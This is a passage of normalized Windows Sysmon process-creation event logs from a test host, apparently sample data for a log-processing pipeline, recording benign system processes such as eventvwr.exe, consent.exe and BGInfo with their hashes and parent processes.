Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"SecurityHealthService.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=99FD6286539D36B93D1255473D75E14E14C7A9AE,MD5=3ECF427D2F76A86676DFB4A67EDDEF64,SHA256=6AD58BB7707259E0EB1599400A603134550B344CD86AB73B04D9DEF937D6A1C6,IMPHASH=F5BD79DC95E0303BDD85756328F16293\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\SecurityHealthService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\securityhealthservice.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-001027d81000", "object.process.hash.imphash": "F5BD79DC95E0303BDD85756328F16293", "object.process.hash.md5": "3ECF427D2F76A86676DFB4A67EDDEF64", "object.process.hash.sha1": "99FD6286539D36B93D1255473D75E14E14C7A9AE", "object.process.hash.sha256": "6AD58BB7707259E0EB1599400A603134550B344CD86AB73B04D9DEF937D6A1C6", "object.process.id": "7088", "object.process.meta": "Description:Windows Security Health Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "securityhealthservice.exe", "object.process.original_name": "SecurityHealthService.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "4.18.1807.16384 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.141Z", "type": "raw", "uuid": "03ea1245-cdbb-4043-b99e-3d71cc6ba532"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.0736537Z\"},\"EventRecordID\":\"27983\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Discovery - domain time\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.041\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-001026d11000}\"},{\"Name\":\"ProcessId\",\"text\":\"7056\"},{\"Name\":\"Image\",\"text\":\"C:\\\\BGinfo\\\\BGINFO.EXE\"},{\"Name\":\"FileVersion\",\"text\":\"4.20\"},{\"Name\":\"Description\",\"text\":\"BGInfo - Wallpaper text configurator\"},{\"Name\":\"Product\",\"text\":\"BGInfo\"},{\"Name\":\"Company\",\"text\":\"Sysinternals\"},{\"Name\":\"OriginalFileName\",\"text\":\"Bginfo.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\BGinfo\\\\BGINFO.EXE\\\" /accepteula /ic:\\\\bginfo\\\\bgconfig.bgi /timer:0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Discovery - domain time", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\BGinfo\\BGINFO.EXE\" /accepteula /ic:\\bginfo\\bgconfig.bgi /timer:0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\bginfo\\bginfo.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-001026d11000", "object.process.hash.imphash": "6EC19FF15BC88DDEDB96115003A96430", "object.process.hash.md5": "3652BA8B882BF6C69AF70CE73CF0D616", "object.process.hash.sha1": "1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25", "object.process.hash.sha256": "0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D", "object.process.id": "7056", "object.process.meta": "Description:BGInfo - Wallpaper text configurator | Product:BGInfo | Company:Sysinternals", "object.process.name": "bginfo.exe", "object.process.original_name": "Bginfo.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\bginfo\\", "object.process.version": "4.20", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.041Z", "type": "raw", "uuid": "ab578b6a-2c89-445d-83ca-197978b63ca5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.5165661Z\"},\"EventRecordID\":\"27970\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.513\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-001001fc0f00}\"},{\"Name\":\"ProcessId\",\"text\":\"748\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"eventvwr.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00206cd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d36c\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00206cd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "119660", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-b79b-5ea4-0000-001001fc0f00", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "748", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.original_name": "eventvwr.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "119660", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.513Z", "type": "raw", "uuid": "809ef34d-9296-4667-9053-fdefba1c1f31"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.4024741Z\"},\"EventRecordID\":\"27958\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-001075da0f00}\"},{\"Name\":\"ProcessId\",\"text\":\"6648\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.404 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"consent.exe\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 6964 318 0000021FF2606500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6964\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 6964 318 0000021FF2606500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-b79b-5ea4-0000-001075da0f00", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6648", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.parent.id": "6964", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.404 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.317Z", "type": "raw", "uuid": "6e3e6e8b-d4da-4b47-9716-46221e71573e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.3418156Z\"},\"EventRecordID\":\"27957\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.269\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-00105bd50f00}\"},{\"Name\":\"ProcessId\",\"text\":\"6656\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"eventvwr.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-b79b-5ea4-0000-00105bd50f00", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "6656", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.original_name": "eventvwr.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.269Z", "type": "raw", "uuid": "6acbb399-3a7b-4565-a3dd-d4f0aa0c61cc"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:40.7124882Z\"},\"EventRecordID\":\"27841\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:34.611\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-001006590b00}\"},{\"Name\":\"ProcessId\",\"text\":\"7000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe\"},{\"Name\":\"FileVersion\",\"text\":\"18.2002.1101.0\"},{\"Name\":\"Description\",\"text\":\"LocalBridge\"},{\"Name\":\"Product\",\"text\":\"LocalBridge\"},{\"Name\":\"Company\"},{\"Name\":\"OriginalFileName\",\"text\":\"LocalBridge.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe\\\" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=723A4542BDEBD6BAC53008073369C476AE0C168E,MD5=405958774EEEF0EC5774764676FE94C4,SHA256=AA4D0C64AC44EA11BCEC87CF7A73BC479DB9047C21D544341B07558E0C1773B5,IMPHASH=00000000000000000000000000000000\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-001025270b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6924\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\LocalBridge.exe\" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program files\\windowsapps\\microsoft.microsoftofficehub_18.2002.1101.0_x64__8wekyb3d8bbwe\\localbridge.exe", "object.process.guid": "747f3d96-b776-5ea4-0000-001006590b00", "object.process.hash.imphash": "00000000000000000000000000000000", "object.process.hash.md5": "405958774EEEF0EC5774764676FE94C4", "object.process.hash.sha1": "723A4542BDEBD6BAC53008073369C476AE0C168E", "object.process.hash.sha256": 